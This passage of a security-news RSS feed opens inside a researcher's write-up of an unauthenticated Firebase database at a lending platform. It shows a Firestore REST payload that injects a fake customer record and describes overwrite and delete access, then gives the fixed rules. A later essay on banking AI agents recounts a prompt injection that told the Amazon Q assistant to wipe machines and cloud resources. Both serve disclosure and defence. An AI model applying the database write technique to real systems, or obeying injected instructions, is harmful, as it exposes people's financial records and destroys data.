the signed loan agreement PDF.</p><p>This is a complete financial and personal identity dossier. In aggregate, the `surveys` collection contained hundreds of records in this format. Every person who had ever submitted a loan application on this platform.</p><h3>Write Access: When Read Is Not the Worst Part</h3><p>Reading hundreds of borrower records is a serious confidentiality violation. But the security rules that permitted reading also permitted writing, modifying, and deleting.full CRUD access with no authentication at any point.</p><p>Creating a new document in any collection:</p><pre>## Construct from the Firestore REST API<br>...<br>...<br><br>payload = {<br>    "fields": {<br>        "name":    {"stringValue": "ATTACKER INJECTED"},<br>        "legalId": {"stringValue": "9999999999999999"}<br>    }<br>}<br># POST to /documents/customers → HTTP 200</pre><p>Response:</p><pre>{<br>  "name": "projects/[PROJECT-ID]/databases/(default)/documents/customers/TYF6XDy0lXqazvvepLhy",<br>  "fields": {<br>    "name":    {"stringValue": "ATTACKER INJECTED"},<br>    "legalId": {"stringValue": "9999999999999999"}<br>  },<br>  "createTime": "2026-02-26T12:17:39.658121Z"</pre><p>Modifying an existing document: PATCH to the document path with new field values; HTTP 200, record overwritten.</p><p>Deleting a document: DELETE to the document path, HTTP 200, record permanently gone with no recovery path.</p><p>I created a canary document in an isolated test collection to confirm write access, then immediately deleted it. No real records were modified or deleted. But the access was real and unrestricted.</p><p>What write and delete access means in practice for a production lending platform:</p><p><strong>Fraudulent record injection:</strong> Insert fake borrower records or loan approvals directly into production collections, bypassing the application’s validation layer entirely.</p><p><strong>Data tampering:</strong> Modify loan amounts, approval statuses, credit scores, or repayment records for any existing borrower. A bad actor could mark a loan as repaid, change a credit grade from F to A, or alter disbursement amounts.</p><p><strong>Evidence destruction:</strong> Delete loan records, customer profiles, or survey submissions. For a regulated financial platform, missing records are a compliance and legal liability.</p><p><strong>Full exfiltration:</strong> Script sequential reads across the customer ID ranges to pull every borrower record in the database. The API imposes no rate limiting that would prevent this.</p><p>The misconfiguration does not distinguish between a researcher running a single test and an attacker running a scripted sweep. The same rules or lack of rules, apply to both.</p><h3><strong>What Comes After the Chain Completes</strong></h3><p>When a chain like this closes, the feeling is not triumph. A single bug is a door. A chain like this is discovering that the building has no locks and never did.</p><p>I kept thinking about the scale. Not abstractly, specifically. The `customers` collection had hundreds of records. The `surveys` collection had hundreds of complete application submissions. Every person who had ever applied for a loan on this platform, every piece of information they had submitted in trust, sitting in a public API endpoint with no access control whatsoever.</p><p>The `surveys` collection was the part that stayed with me. It wasn’t just that PII was exposed. It was the completeness of it. Religion. Mother’s maiden name. Husband’s name. A credit score. A digital signature. The kind of data that, in aggregate, is a complete personal, financial, and social profile of a person. Fields that exist in a loan application precisely because they are sensitive, identity verification, anti-fraud, credit assessment. And all of it retrievable by anyone who could type a URL.</p><p>I stopped enumerating after confirming the pattern across a small number of records. The vulnerability was proven. Going further would have meant accessing data I had no legitimate reason to read.</p><p>What I didn’t stop thinking about was how long this had been this way. The oldest loan records dated back to 2021. The `updatedAt` timestamps in the `customers` collection showed active updates through the week of the test. This wasn’t a recently deployed misconfiguration. It had been open for years, across the entire operational life of the platform, while the borrowers it served had no idea.</p><h3>The Lesson: Test Every Service, Every Time</h3><p>The pattern that makes Firebase misconfiguration so common is the way teams think about security at the project level rather than the service level.</p><p>A developer secures the Realtime Database. They write rules, test them, they work. They move on with the assumption that the other services are handled the same way. But Firestore has its own rules file, separate from the Realtime Database. Storage has its own rules file, separate from Firestore. Each service has to be configured independently.</p><p>The team that built this platform did exactly one thing right: they locked down the Realtime Database. If you only look at that service, the security posture looks considered. But they built the real application data on Firestore and Storage, and neither had rules.</p><p>This is now a reflexive part of how I approach any Firebase-backed application. Find the `init.json`. Extract the `projectId`. Test all three services. Don’t assume that one secured service means the others are secured. The pattern holds more often than it should: if one is misconfigured, check the others immediately.</p><p>The Realtime Database 403 was almost misleading. It created a superficial impression of a team that thought about security. The impression collapsed the moment I tested Firestore.</p><h3>The Fix</h3><p>Every Firebase service has its own security rules configuration, managed in the Firebase Console or deployed via the Firebase CLI. The Firestore and Storage rules for this project were at the default open state. In Firestore, that default looks like this:</p><pre>// Default open rules — anyone, anywhere, no authentication required<br>rules_version = '2';<br>service cloud.firestore {<br>  match /databases/{database}/documents {<br>    match /{document=**} {<br>      allow read, write;<br>    }<br>  }<br>}</pre><p>The baseline fix is requiring authentication before any access:</p><pre>rules_version = '2';<br>service cloud.firestore {<br>  match /databases/{database}/documents {<br>    match /{document=**} {<br>      allow read, write: if request.auth != null;<br>    }<br>  }<br>}</pre><p>For Storage, the same baseline in `storage.rules`:</p><pre>rules_version = '2';<br>service firebase.storage {<br>  match /b/{bucket}/o {<br>    match /{allPaths=**} {<br>      allow read, write: if request.auth != null;<br>    }<br>  }<br>}</pre><p>The right model goes further. In a lending platform, not every authenticated user should read every document. The correct rules reflect the application’s actual access model:</p><ul><li>A borrower can read and update only their own customer record.</li><li>A loan officer can read records associated with their assigned branch or group.</li><li>Survey submissions can only be read by the submitting borrower or authorized staff.</li><li>No user, authenticated or not should have delete access to production financial records without an explicit admin role check.</li></ul><p>But `if request.auth != null` is the baseline that eliminates unauthenticated access entirely. It’s two words added to an existing rule. The team already knew the syntax, the Realtime Database rules proved it. The rules for Firestore and Storage just weren’t there.</p><p>One consistent decision applied across three services instead of one closes the entire chain.</p><h3>What init.json Is and Isn’t</h3><p>The `init.json` file is not the vulnerability. It cannot and should not be removed. Firebase web apps need it to initialize, and removing it breaks the frontend SDK. There are no secrets in that file that should be hidden.</p><p>The vulnerability is a mental model error: “the frontend needs this config file, therefore the backend is safe because clients have to go through the frontend first.” That assumption is wrong. The Firebase REST APIs are public-facing, fully documented, and completely bypasses the frontend. Any attacker can construct a valid Firestore or Storage request using nothing but the `projectId` and a terminal.</p><p>The security boundary in Firebase exists only in the server-side rules. The `init.json` file tells you where every service lives. The rules file controls whether you can get inside. If the rules file is empty, the boundary is empty.</p><p>Every Firebase project I review now, I check all three services. The pattern holds more reliably than it should: if a team misconfigured one, they usually misconfigured the others. The Realtime Database being secured here was the exception. Two out of three services wide open was enough for full compromise of hundreds of borrower records.</p><blockquote>The woman who submitted her loan application did everything she was supposed to do. She trusted that the platform had done the basic things platforms are supposed to do. A two-line rule change in a configuration file, applied when the database was first created, would have made that trust warranted.</blockquote><blockquote>It wasn’t applied. This is what that cost.</blockquote><p><em>If you’re building on Firebase: open the Firebase Console right now, go to Firestore → Rules, Storage → Rules, and Realtime Database → Rules. Read each one carefully. If any of them contain `allow read, write;` without a condition, that service is open to the public internet at this moment.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=90d568038414" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/no-rules-no-locks-firebase-misconfiguration-and-the-borrowers-it-left-behind-90d568038414">No Rules, No Locks: Firebase Misconfiguration and the Borrowers It Left Behind</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['No single organisation can tackle it alone': VodafoneThree says its new security process blocked two million SMS fraud messages]]></title>
<description><![CDATA[VodafoneThree and Barclays prevent 25% more banking scams by using combined intelligence – more banks to come.]]></description>
<link>https://tsecurity.de/de/3651027/it-nachrichten/no-single-organisation-can-tackle-it-alone-vodafonethree-says-its-new-security-process-blocked-two-million-sms-fraud-messages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651027/it-nachrichten/no-single-organisation-can-tackle-it-alone-vodafonethree-says-its-new-security-process-blocked-two-million-sms-fraud-messages/</guid>
<pubDate>Tue, 07 Jul 2026 11:32:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[VodafoneThree and Barclays prevent 25% more banking scams by using combined intelligence – more banks to come.]]></content:encoded>
</item>
<item>
<title><![CDATA[With AI, a wrong answer is a bug. A wrong action is an incident]]></title>
<description><![CDATA[A copilot that gives a wrong answer is a quality problem. An AI agent that takes a wrong action is an incident, sometimes a reportable one. That single difference is most of the story of where banking AI security is heading, and most banks’ current controls were built for the first kind of proble...]]></description>
<link>https://tsecurity.de/de/3650949/it-nachrichten/with-ai-a-wrong-answer-is-a-bug-a-wrong-action-is-an-incident/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650949/it-nachrichten/with-ai-a-wrong-answer-is-a-bug-a-wrong-action-is-an-incident/</guid>
<pubDate>Tue, 07 Jul 2026 11:03:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A copilot that gives a wrong answer is a quality problem. An AI agent that takes a wrong action is an incident, sometimes a reportable one. That single difference is most of the story of where banking AI security is heading, and most banks’ current controls were built for the first kind of problem, not the second.</p>



<p>For two years, the AI a bank had to worry about mostly read and summarized. It drafted a customer email, pulled the gist of a credit memo, answered a relationship manager’s product question. The security questions were about disclosure: could the model see data it shouldn’t, could it leak that data in an answer. Redaction, output filtering and a human reading the response before it went anywhere were reasonable defenses.</p>



<p>Banks have moved past that, faster than most security programs have. The newer systems are agents. They don’t just answer; they act. An agent can pull a customer’s full transaction history, call a fraud-scoring service, adjust a limit or start a payment workflow, chaining several to finish a task with no human in between. Banks are among the most aggressive adopters of agentic AI, and they are pushing it into production faster than most security programs have kept pace with, which means they are also among the first to inherit the security problem that comes with it.</p>



<p>I’d put that problem in one phrase: overprivileged agents. The risk is no longer mainly what the model can see. It is what the agent is allowed to do inside systems that move money and hold regulated data.</p>



<p>This is no longer only a vendor’s warning. On April 30, 2026, the cyber agencies of the Five Eyes nations issued their first joint guidance on securing agentic AI, <a href="https://www.cyber.gov.au/business-government/secure-design/artificial-intelligence/careful-adoption-of-agentic-ai-services" rel="nofollow"><em>Careful Adoption of Agentic AI Services</em></a>. Six agencies signed it, two of them American (CISA and the NSA), alongside the lead agencies of the UK, Australia, Canada and New Zealand. It names privilege as the leading category of agentic risk and calls strict least privilege critical. When five governments coordinate on a single control, “best practice” becomes “expected practice” quickly. For a CISO, that moves the timeline up.</p>



<h2 class="wp-block-heading">What “too much authority” actually looks like</h2>



<p><a href="https://genai.owasp.org/llmrisk/llm062025-excessive-agency/" rel="nofollow">OWASP’s breakdown of the failure mode it calls excessive agency</a> maps cleanly onto a bank. <em>Excessive functionality</em> is an agent that can reach tools its task never needed, like a servicing agent that can also touch the payments API “just in case.” <em>Excessive permissions</em> is the right tool at the wrong scope: a reconciliation agent meant only to read, running with credentials that can also write. <em>Excessive autonomy </em>is a consequential action with no human in the loop: a fee reversed, a limit raised, a record changed, with nothing checking it. In practice these rarely appear alone; they compound.</p>



<p>The canonical example is mundane: an agent that reads one user’s data through an account that can see everyone’s. Translate that to a bank and it becomes an agent that can query every customer’s records to answer a question about one. That is the confused-deputy problem: the agent acts with the full authority of whatever identity it borrowed, while taking instructions from input an attacker may control.</p>



<h2 class="wp-block-heading">The mechanism, from a real incident</h2>



<p>The clearest public illustration so far comes from developer tooling rather than banking, but the mechanism is identical. In July 2025, an attacker used an over-scoped build token to slip malicious code into the open-source repository behind the Amazon Q Developer extension for VS Code, and it shipped in an official release (<a href="https://aws.amazon.com/security/security-bulletins/AWS-2025-015/" rel="nofollow">CVE-2025-8217</a>). The injected instructions told the AI assistant to wipe the local machine and delete cloud resources, down to specific S3 buckets and EC2 instances. The assistant could reach the local filesystem, the shell and AWS CLI tools, so structurally little stood between those instructions and real damage. What stopped them was a bug: the payload had a syntax error and never ran, and AWS found no customer environments affected. But the extension had been installed close to a million times, and the margin of safety was an accident.</p>



<p>The uncomfortable part is not that the agent was “hacked” in the usual sense. Had the attacker’s code been written correctly, the agent would have done exactly what the injected text told it, through a channel it trusted. The lesson: an agent with broad tools, write access and no approval gate is dangerous not only when someone steals its credentials, but any time someone can reach its input. And in a bank, reachable inputs sit everywhere an agent reads text it did not author: the memo line on a wire, a customer’s email in a dispute, a PDF uploaded to a loan file, a free-text field in a KYC record. This is indirect prompt injection, and the defenses for it are still partial. You cannot reliably solve it by instructing the agent to behave. You solve it by limiting what it is able to do, regardless of what it is told.</p>



<h2 class="wp-block-heading">What I keep seeing in deployments</h2>



<p>In the redaction-control work I’ve done with banks, the gap is rarely the model. It is that the agent gets wired to the data and the tools first; what it should be allowed to reach gets asked later, if at all.</p>



<p>One pattern recurs. A customer-servicing agent is wired into the core banking system to resolve account queries. To answer a simple question, it pulls the customer’s entire profile into context: full account number, date of birth, the complete transaction narrative. The task needed the last four digits and a list of recent transactions; the agent got everything, and each field then sat in prompts, logs and traces never scoped as sensitive data. The fix was not a sharper prompt. It was moving redaction to the retrieval boundary, so those fields were tokenized before they reached the agent, and scoping its read access to the one customer in the open case, not the whole table.</p>



<p>The other half of the problem is authority, not data. That same agent often shares a service account with a batch job, so it can write to fields well beyond a customer’s question. A dedicated identity with its own scoped, short-lived credentials is unglamorous work, but it is the difference between an agent that can read one case and one that can quietly change thousands.</p>



<h2 class="wp-block-heading">Extending controls banks already have</h2>



<p>The reassuring part is that banks are not starting from zero. Maker-checker, segregation of duties, four-eyes approval, least privilege, immutable audit: this is muscle memory in a bank. The work is extending it to a non-human actor that runs at machine speed.</p>



<p>Give the agent its own managed identity with narrowly scoped, short-lived credentials instead of letting it borrow an employee’s session. That is the direct fix for the confused-deputy problem, and what the joint guidance asks for. Scope tools per task and per resource: read versus write, and which accounts, not a blanket grant. Put irreversible, high-impact actions (moving money, changing entitlements, closing accounts, exporting bulk data) behind explicit approval gates, the human-in-the-loop the guidance reserves for high-cost actions. Redact at the data-access boundary, not only on the output: an agent that never retrieves the full account number cannot leak it downstream. And log the agent’s plan and every tool call, not just its final answer, because in an agentic system the damage lives in the actions.</p>



<h2 class="wp-block-heading">Why the clock is real</h2>



<p>Regulation has put a date on this. <a href="https://www.amsshardul.com/insight/enforcement-of-the-dpdp-act-and-notification-of-the-dpdp-rules/" rel="nofollow">India’s Digital Personal Data Protection Rules</a> were notified on November 14, 2025; the institutional provisions are already in force, and the substantive obligations (purpose limitation, data minimization, breach notification) take full effect in May 2027. Under that lens, an agent that can reach more customer data than its task requires is not only a security weakness; it is a data-minimization and accountability problem. Banks under GDPR or the EU AI Act face the same logic from a different statute.</p>



<p>One honest caveat: none of these laws actually names AI agents. Mapping their principles onto agent authorization is interpretation and prudent risk management, and each bank should work the specifics through with its own legal and compliance teams rather than treat the matter as settled.</p>



<h2 class="wp-block-heading">The trade-offs nobody has solved</h2>



<p>None of this is free. Approval gates work against the entire reason to deploy an agent: gate every action and you have rebuilt a slower manual process. Deciding which actions to gate, and which can run autonomously within tight scope, is a real design problem that turns on each workflow’s blast radius. Logging every plan and tool call produces audit volume most pipelines were not built for. Standards for agent identity are still immature, and the agent supply chain is itself an attack surface, as the Amazon Q case showed.</p>



<p>These are real tensions, not problems with clean answers. But the governance gap that the 2026 surveys keep finding is not a story of banks failing to deploy agents. It is controls trailing agents that are already running. The alternative, porting copilot-era defenses onto agents and trusting output filters, guards the wrong door.</p>



<p>Banks are hitting this first because they are ahead. That is also the opportunity: the institutions that settle their agent authorization model now, while deployments are still small enough to change course, will not just avoid the incident. They will set the pattern everyone else copies.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Summer.fi-Angriff: 2, 08 Millionen % APY-Fehlanzeige führt zu 6 Mio. USDC/DAI-Abfluss in DeFi]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Der Multichain-Protocol Summer.fi (ehemals Oasis.app) meldet nach einem Angriff, bei dem automatisierte Vaults geleert wurden, einen Abfluss von rund 6 Millionen US-Dollar in DAI-Token. Auffällig ist die Mechanik: Mit einem Flash-Loan wurde die Liquidität in einem scheinbar...]]></description>
<link>https://tsecurity.de/de/3649840/it-security-nachrichten/summerfi-angriff-2-08-millionen-apy-fehlanzeige-fuehrt-zu-6-mio-usdcdai-abfluss-in-defi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649840/it-security-nachrichten/summerfi-angriff-2-08-millionen-apy-fehlanzeige-fuehrt-zu-6-mio-usdcdai-abfluss-in-defi/</guid>
<pubDate>Mon, 06 Jul 2026 22:54:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-defi-apy-spike-summerfi.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-defi-apy-spike-summerfi.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-defi-apy-spike-summerfi-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-defi-apy-spike-summerfi-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-defi-apy-spike-summerfi-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-defi-apy-spike-summerfi-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-defi-apy-spike-summerfi-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Der Multichain-Protocol Summer.fi (ehemals Oasis.app) meldet nach einem Angriff, bei dem automatisierte Vaults geleert wurden, einen Abfluss von rund 6 Millionen US-Dollar in DAI-Token. Auffällig ist die Mechanik: Mit einem Flash-Loan wurde die Liquidität in einem scheinbar „Low-Risk“-Pool so verzerrt, dass die angezeigte Rendite (APY) kurzfristig auf etwa 2, 08 Millionen […]</p>
<div><a href="https://www.it-boltwise.de/summer-fi-angriff-2-08-millionen-apy-fehlanzeige-fuehrt-zu-6-mio-usdc-dai-abfluss-in-defi.html">... den vollständigen Artikel <strong>»Summer.fi-Angriff: 2, 08 Millionen % APY-Fehlanzeige führt zu 6 Mio. USDC/DAI-Abfluss in DeFi«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/summer-fi-angriff-2-08-millionen-apy-fehlanzeige-fuehrt-zu-6-mio-usdc-dai-abfluss-in-defi.html">Summer.fi-Angriff: 2, 08 Millionen % APY-Fehlanzeige führt zu 6 Mio. USDC/DAI-Abfluss in DeFi</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What billions of AI predictions taught Expedia before the age of AI agents]]></title>
<description><![CDATA[There's an important distinction between AI that just works today, and AI that lasts at scale. Many companies optimize hard for the first one without ever asking whether they're building the second.Velocity without discipline and strategic direction is a liability, not an asset. The hardest part ...]]></description>
<link>https://tsecurity.de/de/3649313/it-nachrichten/what-billions-of-ai-predictions-taught-expedia-before-the-age-of-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649313/it-nachrichten/what-billions-of-ai-predictions-taught-expedia-before-the-age-of-ai-agents/</guid>
<pubDate>Mon, 06 Jul 2026 18:20:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>There's an important distinction between AI that just works today, and AI that lasts at scale. Many companies optimize hard for the first one without ever asking whether they're building the second.</p><p>Velocity without discipline and strategic direction is a liability, not an asset. The hardest part of building AI at scale isn't getting a model to work once. It's building systems that continue to work, scale beyond individual teams and use cases, and improve consistently over time.</p><p>Today's AI systems do more than just predict and optimize. They converse, reason, and increasingly take action. An autonomous system making decisions on a traveler's behalf creates a very different set of expectations around reliability, governance, and accountability. As AI takes on more of those roles, the principles behind how these systems operate matter more than ever.</p><p>We have spent years applying AI and machine learning (ML) across the traveler journey — from personalization, ranking, and recommendations, to fraud prevention, customer support, and, more recently, generative and agentic AI experiences. That depth of experience is what led us to develop a set of ML and AI principles to guide how we build, deploy, and evolve AI systems across our company.</p><p>The goal is simple: Make sure the systems we build create real business value, scale, and operate safely. These principles define how we measure, design, govern, and operate our systems.</p><h2><b>From principles to practice</b></h2><p>Publishing principles is the easy part. The harder and more important work is turning them into operating mechanisms: Recommendations, requirements, tooling, and release processes that teams actually use. </p><p>We have begun using 'Agentic Release' tollgates: A set of recommended and, in some cases, required checks before launching agentic AI features. These tollgates translate principles like clear ownership, risk-based governance, evaluation, safe rollout, and monitoring into concrete expectations for teams. </p><p>Some of these recommendations and requirements are already being automated and integrated into the software development lifecycle (SDLC). Over time, the goal is for these expectations to become embedded in how we design, evaluate, approve, launch, and monitor AI systems from the start.</p><h2><b>Outcomes: Measuring what actually matters</b></h2><p>The first test for any model is whether it improves a business outcome and, ultimately, the traveler experience — not whether it just improves a technical metric. </p><ol><li><p><b>Align models to metrics with business impact: </b>Every ML effort must tie directly to a key business outcome or traveler experience metric. Technical optimizations are useful midpoints, not end goals<b>.</b></p></li><li><p><b>Optimize for return on cost</b>: The value a model creates has to justify what it costs to develop, train, and monitor, plus the operational complexity it adds. Favor solutions that deliver lasting impact relative to what they cost to run.</p></li><li><p><b>Justify complexity against strong baselines: </b>Complexity should be earned, not assumed. Start with a strong baseline: An existing general model, a simple heuristic, an off-the-shelf solution. Reach for specialized models or more complex architectures only when simpler options genuinely can't meet the bar.</p></li><li><p><b>Require both offline and online evaluation</b>: No model goes to broad deployment on offline validation alone or jumps straight to A/B testing. Every model must perform in both offline and online evaluations. Over time, our offline evaluations should reliably predict what we see online.</p></li></ol><h2><b>Design: building systems that scale beyond the teams that build them</b></h2><p>Getting a model to work is one challenge. Making its value extend beyond a single team or use case is the harder one.</p><ol><li><p><b>Build on shared foundations; specialize only when justified:</b> Favor shared, platform-wide foundations for core capabilities, data representations, and model building blocks. Specialization should build on those foundations, not spin up isolated stacks, so when the foundation improves, the gains flow across the organization.</p></li><li><p><b>Treat data as a first-class product</b>: A model's quality is bounded by the quality of its data. We need to maintain robust pipelines, clear lineage, reproducibility, and reusable features built with documented ownership, clear schemas, and SLAs that other teams can rely on.</p></li><li><p><b>Prioritize generality over local optimization</b>: When two approaches perform similarly, favor the one whose learnings, assets, and operating patterns can be reused across teams, brands, and use cases. We should optimize not just for local performance, but for how quickly improvements can diffuse across the company and compound over time. </p></li><li><p><b>Minimize and sunset manual business rules: </b>Manual rules are sometimes necessary for policy, safety, or compliance, but they should be explicit and reviewed regularly, never silent patches for weak models or a source of permanent maintenance debt.</p></li><li><p><b>Reproducibility and traceability by default</b>: Training data, features, configurations, evaluation results, deployment versions, and key decisions should all be documented and recoverable. That's what lets you debug a production issue months later and hand off ownership without losing institutional knowledge.</p></li></ol><h2><b>Trust: ownership, governance, and operating responsibly at scale</b></h2><p>The bar for deploying AI isn't just "does it work?" It's "can we stand behind it?" Trust isn't something you add at the end; it's earned over time and maintained across the full lifecycle of every model we ship.</p><ol><li><p><b>Assign clear ownership and accountability:</b> Every model needs defined ownership across its lifecycle — a business owner, a product owner, an AI owner, and an operational owner. These don't need to be four people, but the responsibilities must be explicit. Who's accountable for outcomes? Who responds if the model drifts? Who answers the incident at 2 a.m.? Without this in place, models become orphaned and problems surface with no one to own them.</p></li><li><p><b>Adhere to standards and governance:</b> AI and ML models must use approved platforms and comply with established company standards, release gates, and governance processes. Operating outside these guardrails requires a clear, defined path to remediation or deprecation, rather than an open-ended exception. </p></li><li><p><b>Govern proportionally to risk</b>: The level of review, evaluation rigor, and human oversight should scale with a model's impact. A customer-facing model that affects pricing or availability for millions of travelers demands a far higher bar than an internal tool used by a small team. For high-impact, safety-sensitive, or highly autonomous systems, human-in-the-loop checkpoints are built in from the start. </p></li><li><p><b>Design for fairness, privacy, and transparency</b>: We actively test for unintended bias, have strong data guardrails, and favor explainability when decisions meaningfully affect users. These are incorporated from the start, not added on.</p></li><li><p><b>Design for safe rollout, rollback, and control</b>: Deployments are progressive, with rollback paths, fallback mechanisms, and circuit breakers ready before launch. The ability to safely undo a deployment matters as much as the ability to ship it.</p></li><li><p><b>Monitor continuously and adapt:</b> Once live, teams must actively monitor quality, drift, latency, cost, and business performance and retrain or recalibrate when the data shifts. A team should always be able to explain how its model is performing now, not just how it performed when it launched.</p></li></ol><p>These principles do more than define how we build. They define what we're willing to ship and how we stand behind it. In a world where AI systems are increasingly consequential and make real decisions for real travelers and partners, these standards matter. Applied consistently, they build responsible AI that lasts.</p><p><i>Xavi Amatriain is Chief AI and Data Officer at Expedia Group</i></p><p><i>Xavier will share more details about Expedia's architecture during his session at </i><a href="https://venturebeat.com/vbtransform2026/agenda"><i>VB Transform</i></a><i> on July 14 at 11:10 am PT. He will discuss: "Expedia's blueprint for building autonomous agents for high-stakes transactional systems." </i></p><p><i>Interested in attending VB Transform 2026? Register </i><a href="https://web.cvent.com/event/27401f5a-f49e-46fc-90a3-eee31c2a4818/register"><i><u>here</u></i></a><i>. A select number of complimentary passes are also available to senior technology leaders. </i><a href="mailto:events@venturebeat.com"><i><u>Contact us </u></i></a><i>to get yours.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Boost City regulator’s powers to help protect UK consumers from AI, says watchdog]]></title>
<description><![CDATA[FCA’s review into how tech will reshape financial services warns about amplified risks of cyber-crime and fraudBusiness live – latest updatesMinisters have been urged to toughen the City regulator’s powers to protect consumers against the potential risks of AI, according to a landmark review.The ...]]></description>
<link>https://tsecurity.de/de/3648576/it-nachrichten/boost-city-regulators-powers-to-help-protect-uk-consumers-from-ai-says-watchdog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648576/it-nachrichten/boost-city-regulators-powers-to-help-protect-uk-consumers-from-ai-says-watchdog/</guid>
<pubDate>Mon, 06 Jul 2026 13:18:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FCA’s review into how tech will reshape financial services warns about amplified risks of cyber-crime and fraud</p><ul><li><p><a href="https://www.theguardian.com/business/live/2026/jul/06/sky-takeover-itv-broadcasting-media-deal-business-live-news">Business live – latest updates</a></p></li></ul><p>Ministers have been urged to toughen the City regulator’s powers to protect consumers against the potential risks of AI, according to a landmark review.</p><p>The Financial Conduct Authority’s (FCA) Mills review, which looked at how AI will reshape financial services from 2030 onward, found that companies are already starting to shift from human-led activities towards AI-enabled services for everyday consumers.</p> <a href="https://www.theguardian.com/business/2026/jul/06/boost-city-regulators-powers-protect-uk-consumers-ai-cyber-crime-fraud-watchdog">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Can Forge Documents in Minutes – “Looks Right” Is No Longer Enough]]></title>
<description><![CDATA[Generative AI is making document fraud faster and harder to spot, pushing security teams to verify provenance, signatures and file integrity at intake securely. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read…
Read more →
The post AI Can Forge Doc...]]></description>
<link>https://tsecurity.de/de/3648492/it-security-nachrichten/ai-can-forge-documents-in-minutes-looks-right-is-no-longer-enough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648492/it-security-nachrichten/ai-can-forge-documents-in-minutes-looks-right-is-no-longer-enough/</guid>
<pubDate>Mon, 06 Jul 2026 12:50:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Generative AI is making document fraud faster and harder to spot, pushing security teams to verify provenance, signatures and file integrity at intake securely. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-can-forge-documents-in-minutes-looks-right-is-no-longer-enough/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ai-can-forge-documents-in-minutes-looks-right-is-no-longer-enough/">AI Can Forge Documents in Minutes – “Looks Right” Is No Longer Enough</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Can Forge Documents in Minutes – “Looks Right” Is No Longer Enough]]></title>
<description><![CDATA[Generative AI is making document fraud faster and harder to spot, pushing security teams to verify provenance, signatures and file integrity at intake securely.]]></description>
<link>https://tsecurity.de/de/3648471/it-security-nachrichten/ai-can-forge-documents-in-minutes-looks-right-is-no-longer-enough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648471/it-security-nachrichten/ai-can-forge-documents-in-minutes-looks-right-is-no-longer-enough/</guid>
<pubDate>Mon, 06 Jul 2026 12:38:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Generative AI is making document fraud faster and harder to spot, pushing security teams to verify provenance, signatures and file integrity at intake securely.]]></content:encoded>
</item>
<item>
<title><![CDATA[The future of payment fraud could be automated]]></title>
<description><![CDATA[Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and…
Read more →
The post The future...]]></description>
<link>https://tsecurity.de/de/3647741/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647741/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</guid>
<pubDate>Mon, 06 Jul 2026 06:52:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
